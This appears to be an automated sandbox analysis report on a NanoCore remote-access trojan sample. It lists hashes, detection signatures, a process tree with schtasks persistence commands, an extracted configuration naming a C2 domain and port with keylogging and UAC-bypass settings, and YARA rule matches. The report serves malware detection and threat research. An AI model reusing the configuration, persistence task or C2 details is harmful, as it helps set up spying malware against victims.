Play interactive tour

Edit tour

Windows Analysis Report LFEs2N6DU4.exe

Overview

General Information

Sample Name:	LFEs2N6DU4.exe
Analysis ID:	502379
MD5:	5b3262b61a5eaa3ebe7e8bdc4958fc3f
SHA1:	112314d871226e07180bf2d0a2852120cbc1399f
SHA256:	799a0831a87f80ddced683cf26c082c58c936a1bb868dd0e97552a9f035ba4ee
Tags:	exeNanoCore
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Sigma detected: NanoCore

Detected Nanocore Rat

Yara detected Nanocore RAT

Writes to foreign memory regions

Allocates memory in foreign processes

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Installs a raw input device (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Drops PE files

Detected TCP or UDP traffic on non-standard ports

Binary contains a suspicious time stamp

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

LFEs2N6DU4.exe (PID: 2752 cmdline: 'C:\Users\user\Desktop\LFEs2N6DU4.exe' MD5: 5B3262B61A5EAA3EBE7E8BDC4958FC3F)

LFEs2N6DU4.exe (PID: 3784 cmdline: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe MD5: 5B3262B61A5EAA3EBE7E8BDC4958FC3F)

schtasks.exe (PID: 5828 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpA85B.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 2944 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpAD7D.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 4196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

LFEs2N6DU4.exe (PID: 2860 cmdline: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe 0 MD5: 5B3262B61A5EAA3EBE7E8BDC4958FC3F)

LFEs2N6DU4.exe (PID: 6504 cmdline: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe MD5: 5B3262B61A5EAA3EBE7E8BDC4958FC3F)

dhcpmon.exe (PID: 6188 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 5B3262B61A5EAA3EBE7E8BDC4958FC3F)

dhcpmon.exe (PID: 6648 cmdline: C:\Users\user\AppData\Local\Temp\dhcpmon.exe MD5: 5B3262B61A5EAA3EBE7E8BDC4958FC3F)

dhcpmon.exe (PID: 6304 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 5B3262B61A5EAA3EBE7E8BDC4958FC3F)

dhcpmon.exe (PID: 6732 cmdline: C:\Users\user\AppData\Local\Temp\dhcpmon.exe MD5: 5B3262B61A5EAA3EBE7E8BDC4958FC3F)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "9845a945-f2ff-4e93-b909-aece664d", "Group": "J", "Domain1": "cloudhost.myfirewall.org", "Domain2": "cloudhost.myfirewall.org", "Port": 5654, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "cloudhost.myfirewall.org", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000018.00000002.395949741.0000000004179000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000018.00000002.395949741.0000000004179000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4356d:$a: NanoCore 0x435c6:$a: NanoCore 0x43603:$a: NanoCore 0x4367c:$a: NanoCore 0x56d27:$a: NanoCore 0x56d3c:$a: NanoCore 0x56d71:$a: NanoCore 0x6fd3b:$a: NanoCore 0x6fd50:$a: NanoCore 0x6fd85:$a: NanoCore 0x435cf:$b: ClientPlugin 0x4360c:$b: ClientPlugin 0x43f0a:$b: ClientPlugin 0x43f17:$b: ClientPlugin 0x56ae3:$b: ClientPlugin 0x56afe:$b: ClientPlugin 0x56b2e:$b: ClientPlugin 0x56d45:$b: ClientPlugin 0x56d7a:$b: ClientPlugin 0x6faf7:$b: ClientPlugin 0x6fb12:$b: ClientPlugin
00000016.00000002.399257150.0000000003BBA000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x37cdd:$x1: NanoCore.ClientPluginHost 0x5fcfd:$x1: NanoCore.ClientPluginHost 0x37d1a:$x2: IClientNetworkHost 0x5fd3a:$x2: IClientNetworkHost 0x3b84d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x6386d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000016.00000002.399257150.0000000003BBA000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000016.00000002.399257150.0000000003BBA000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x37a45:$a: NanoCore 0x37a55:$a: NanoCore 0x37c89:$a: NanoCore 0x37c9d:$a: NanoCore 0x37cdd:$a: NanoCore 0x5fa65:$a: NanoCore 0x5fa75:$a: NanoCore 0x5fca9:$a: NanoCore 0x5fcbd:$a: NanoCore 0x5fcfd:$a: NanoCore 0x37aa4:$b: ClientPlugin 0x37ca6:$b: ClientPlugin 0x37ce6:$b: ClientPlugin 0x5fac4:$b: ClientPlugin 0x5fcc6:$b: ClientPlugin 0x5fd06:$b: ClientPlugin 0x37bcb:$c: ProjectData 0x5fbeb:$c: ProjectData 0x385d2:$d: DESCrypto 0x605f2:$d: DESCrypto 0x3ff9e:$e: KeepAlive
00000015.00000002.388544589.000000000279F000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x71f0d:$x1: NanoCore.ClientPluginHost 0x71f4a:$x2: IClientNetworkHost 0x75a7d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000015.00000002.388544589.000000000279F000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x71c75:$a: NanoCore 0x71c85:$a: NanoCore 0x71eb9:$a: NanoCore 0x71ecd:$a: NanoCore 0x71f0d:$a: NanoCore 0x71cd4:$b: ClientPlugin 0x71ed6:$b: ClientPlugin 0x71f16:$b: ClientPlugin 0x71dfb:$c: ProjectData 0x72802:$d: DESCrypto 0x743b7:$i: get_Connected 0x72b38:$j: #=q 0x72b68:$j: #=q 0x72b84:$j: #=q 0x72bb4:$j: #=q 0x72bd0:$j: #=q 0x72bec:$j: #=q 0x72c1c:$j: #=q 0x72c38:$j: #=q 0x72c7c:$j: #=q 0x72c98:$j: #=q
00000019.00000002.405182304.0000000003BB9000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000019.00000002.405182304.0000000003BB9000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4356d:$a: NanoCore 0x435c6:$a: NanoCore 0x43603:$a: NanoCore 0x4367c:$a: NanoCore 0x56d27:$a: NanoCore 0x56d3c:$a: NanoCore 0x56d71:$a: NanoCore 0x6fd3b:$a: NanoCore 0x6fd50:$a: NanoCore 0x6fd85:$a: NanoCore 0x435cf:$b: ClientPlugin 0x4360c:$b: ClientPlugin 0x43f0a:$b: ClientPlugin 0x43f17:$b: ClientPlugin 0x56ae3:$b: ClientPlugin 0x56afe:$b: ClientPlugin 0x56b2e:$b: ClientPlugin 0x56d45:$b: ClientPlugin 0x56d7a:$b: ClientPlugin 0x6faf7:$b: ClientPlugin 0x6fb12:$b: ClientPlugin
00000019.00000002.404921378.0000000002BB1000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000019.00000002.404921378.0000000002BB1000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x69477:$a: NanoCore 0x694d0:$a: NanoCore 0x6950d:$a: NanoCore 0x69586:$a: NanoCore 0x694d9:$b: ClientPlugin 0x69516:$b: ClientPlugin 0x69e14:$b: ClientPlugin 0x69e21:$b: ClientPlugin 0x5f5fd:$e: KeepAlive 0x69961:$g: LogClientMessage 0x698e1:$i: get_Connected 0x598ad:$j: #=q 0x598dd:$j: #=q 0x59919:$j: #=q 0x59941:$j: #=q 0x59971:$j: #=q 0x599a1:$j: #=q 0x599d1:$j: #=q 0x59a01:$j: #=q 0x59a1d:$j: #=q 0x59a4d:$j: #=q
00000015.00000002.390215746.00000000038A9000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10d1d:$x1: NanoCore.ClientPluginHost 0xc462d:$x1: NanoCore.ClientPluginHost 0x10d5a:$x2: IClientNetworkHost 0xc466a:$x2: IClientNetworkHost 0x1488d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xc819d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000015.00000002.390215746.00000000038A9000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000015.00000002.390215746.00000000038A9000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10a85:$a: NanoCore 0x10a95:$a: NanoCore 0x10cc9:$a: NanoCore 0x10cdd:$a: NanoCore 0x10d1d:$a: NanoCore 0xc4395:$a: NanoCore 0xc43a5:$a: NanoCore 0xc45d9:$a: NanoCore 0xc45ed:$a: NanoCore 0xc462d:$a: NanoCore 0x10ae4:$b: ClientPlugin 0x10ce6:$b: ClientPlugin 0x10d26:$b: ClientPlugin 0xc43f4:$b: ClientPlugin 0xc45f6:$b: ClientPlugin 0xc4636:$b: ClientPlugin 0x10c0b:$c: ProjectData 0xc451b:$c: ProjectData 0x11612:$d: DESCrypto 0xc4f22:$d: DESCrypto 0x18fde:$e: KeepAlive
00000018.00000002.392927550.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000018.00000002.392927550.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000018.00000002.392927550.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000014.00000002.379660901.000000000414A000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x37cdd:$x1: NanoCore.ClientPluginHost 0x5fcfd:$x1: NanoCore.ClientPluginHost 0x37d1a:$x2: IClientNetworkHost 0x5fd3a:$x2: IClientNetworkHost 0x3b84d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x6386d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000014.00000002.379660901.000000000414A000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000014.00000002.379660901.000000000414A000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x37a45:$a: NanoCore 0x37a55:$a: NanoCore 0x37c89:$a: NanoCore 0x37c9d:$a: NanoCore 0x37cdd:$a: NanoCore 0x5fa65:$a: NanoCore 0x5fa75:$a: NanoCore 0x5fca9:$a: NanoCore 0x5fcbd:$a: NanoCore 0x5fcfd:$a: NanoCore 0x37aa4:$b: ClientPlugin 0x37ca6:$b: ClientPlugin 0x37ce6:$b: ClientPlugin 0x5fac4:$b: ClientPlugin 0x5fcc6:$b: ClientPlugin 0x5fd06:$b: ClientPlugin 0x37bcb:$c: ProjectData 0x5fbeb:$c: ProjectData 0x385d2:$d: DESCrypto 0x605f2:$d: DESCrypto 0x3ff9e:$e: KeepAlive
0000000D.00000002.537037036.0000000003DA9000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000D.00000002.537037036.0000000003DA9000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4356d:$a: NanoCore 0x435c6:$a: NanoCore 0x43603:$a: NanoCore 0x4367c:$a: NanoCore 0x56d27:$a: NanoCore 0x56d3c:$a: NanoCore 0x56d71:$a: NanoCore 0x6fd3b:$a: NanoCore 0x6fd50:$a: NanoCore 0x6fd85:$a: NanoCore 0x435cf:$b: ClientPlugin 0x4360c:$b: ClientPlugin 0x43f0a:$b: ClientPlugin 0x43f17:$b: ClientPlugin 0x56ae3:$b: ClientPlugin 0x56afe:$b: ClientPlugin 0x56b2e:$b: ClientPlugin 0x56d45:$b: ClientPlugin 0x56d7a:$b: ClientPlugin 0x6faf7:$b: ClientPlugin 0x6fb12:$b: ClientPlugin
00000019.00000002.403212048.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000019.00000002.403212048.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000019.00000002.403212048.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000001.00000002.310115829.0000000003559000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10d1d:$x1: NanoCore.ClientPluginHost 0xc462d:$x1: NanoCore.ClientPluginHost 0x10d5a:$x2: IClientNetworkHost 0xc466a:$x2: IClientNetworkHost 0x1488d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xc819d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000001.00000002.310115829.0000000003559000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000001.00000002.310115829.0000000003559000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10a85:$a: NanoCore 0x10a95:$a: NanoCore 0x10cc9:$a: NanoCore 0x10cdd:$a: NanoCore 0x10d1d:$a: NanoCore 0xc4395:$a: NanoCore 0xc43a5:$a: NanoCore 0xc45d9:$a: NanoCore 0xc45ed:$a: NanoCore 0xc462d:$a: NanoCore 0x10ae4:$b: ClientPlugin 0x10ce6:$b: ClientPlugin 0x10d26:$b: ClientPlugin 0xc43f4:$b: ClientPlugin 0xc45f6:$b: ClientPlugin 0xc4636:$b: ClientPlugin 0x10c0b:$c: ProjectData 0xc451b:$c: ProjectData 0x11612:$d: DESCrypto 0xc4f22:$d: DESCrypto 0x18fde:$e: KeepAlive
00000016.00000002.399603161.0000000003C59000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10d1d:$x1: NanoCore.ClientPluginHost 0xc462d:$x1: NanoCore.ClientPluginHost 0x10d5a:$x2: IClientNetworkHost 0xc466a:$x2: IClientNetworkHost 0x1488d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xc819d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000016.00000002.399603161.0000000003C59000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000016.00000002.399603161.0000000003C59000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10a85:$a: NanoCore 0x10a95:$a: NanoCore 0x10cc9:$a: NanoCore 0x10cdd:$a: NanoCore 0x10d1d:$a: NanoCore 0xc4395:$a: NanoCore 0xc43a5:$a: NanoCore 0xc45d9:$a: NanoCore 0xc45ed:$a: NanoCore 0xc462d:$a: NanoCore 0x10ae4:$b: ClientPlugin 0x10ce6:$b: ClientPlugin 0x10d26:$b: ClientPlugin 0xc43f4:$b: ClientPlugin 0xc45f6:$b: ClientPlugin 0xc4636:$b: ClientPlugin 0x10c0b:$c: ProjectData 0xc451b:$c: ProjectData 0x11612:$d: DESCrypto 0xc4f22:$d: DESCrypto 0x18fde:$e: KeepAlive
0000000D.00000002.527752364.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000D.00000002.527752364.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000D.00000002.527752364.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000001A.00000002.419717082.0000000002321000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000001A.00000002.419717082.0000000002321000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x69477:$a: NanoCore 0x694d0:$a: NanoCore 0x6950d:$a: NanoCore 0x69586:$a: NanoCore 0x694d9:$b: ClientPlugin 0x69516:$b: ClientPlugin 0x69e14:$b: ClientPlugin 0x69e21:$b: ClientPlugin 0x5f5fd:$e: KeepAlive 0x69961:$g: LogClientMessage 0x698e1:$i: get_Connected 0x598ad:$j: #=q 0x598dd:$j: #=q 0x59919:$j: #=q 0x59941:$j: #=q 0x59971:$j: #=q 0x599a1:$j: #=q 0x599d1:$j: #=q 0x59a01:$j: #=q 0x59a1d:$j: #=q 0x59a4d:$j: #=q
00000001.00000002.309846950.00000000034BA000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x37cdd:$x1: NanoCore.ClientPluginHost 0x5fcfd:$x1: NanoCore.ClientPluginHost 0x37d1a:$x2: IClientNetworkHost 0x5fd3a:$x2: IClientNetworkHost 0x3b84d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x6386d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000001.00000002.309846950.00000000034BA000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000001.00000002.309846950.00000000034BA000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x37a45:$a: NanoCore 0x37a55:$a: NanoCore 0x37c89:$a: NanoCore 0x37c9d:$a: NanoCore 0x37cdd:$a: NanoCore 0x5fa65:$a: NanoCore 0x5fa75:$a: NanoCore 0x5fca9:$a: NanoCore 0x5fcbd:$a: NanoCore 0x5fcfd:$a: NanoCore 0x37aa4:$b: ClientPlugin 0x37ca6:$b: ClientPlugin 0x37ce6:$b: ClientPlugin 0x5fac4:$b: ClientPlugin 0x5fcc6:$b: ClientPlugin 0x5fd06:$b: ClientPlugin 0x37bcb:$c: ProjectData 0x5fbeb:$c: ProjectData 0x385d2:$d: DESCrypto 0x605f2:$d: DESCrypto 0x3ff9e:$e: KeepAlive
0000000D.00000002.534572652.0000000002DA1000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000014.00000002.379884809.00000000041E9000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10d1d:$x1: NanoCore.ClientPluginHost 0xc462d:$x1: NanoCore.ClientPluginHost 0x10d5a:$x2: IClientNetworkHost 0xc466a:$x2: IClientNetworkHost 0x1488d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xc819d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000014.00000002.379884809.00000000041E9000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000014.00000002.379884809.00000000041E9000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10a85:$a: NanoCore 0x10a95:$a: NanoCore 0x10cc9:$a: NanoCore 0x10cdd:$a: NanoCore 0x10d1d:$a: NanoCore 0xc4395:$a: NanoCore 0xc43a5:$a: NanoCore 0xc45d9:$a: NanoCore 0xc45ed:$a: NanoCore 0xc462d:$a: NanoCore 0x10ae4:$b: ClientPlugin 0x10ce6:$b: ClientPlugin 0x10d26:$b: ClientPlugin 0xc43f4:$b: ClientPlugin 0xc45f6:$b: ClientPlugin 0xc4636:$b: ClientPlugin 0x10c0b:$c: ProjectData 0xc451b:$c: ProjectData 0x11612:$d: DESCrypto 0xc4f22:$d: DESCrypto 0x18fde:$e: KeepAlive
0000001A.00000002.415670197.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000001A.00000002.415670197.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000001A.00000002.415670197.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000001.00000002.309323538.000000000244F000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x72029:$x1: NanoCore.ClientPluginHost 0x72066:$x2: IClientNetworkHost 0x75b99:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000001.00000002.309323538.000000000244F000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x71d91:$a: NanoCore 0x71da1:$a: NanoCore 0x71fd5:$a: NanoCore 0x71fe9:$a: NanoCore 0x72029:$a: NanoCore 0x71df0:$b: ClientPlugin 0x71ff2:$b: ClientPlugin 0x72032:$b: ClientPlugin 0x71f17:$c: ProjectData 0x7291e:$d: DESCrypto 0x744d3:$i: get_Connected 0x72c54:$j: #=q 0x72c84:$j: #=q 0x72ca0:$j: #=q 0x72cd0:$j: #=q 0x72cec:$j: #=q 0x72d08:$j: #=q 0x72d38:$j: #=q 0x72d54:$j: #=q 0x72d98:$j: #=q 0x72db4:$j: #=q
0000000D.00000002.538189526.00000000055D0000.00000004.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
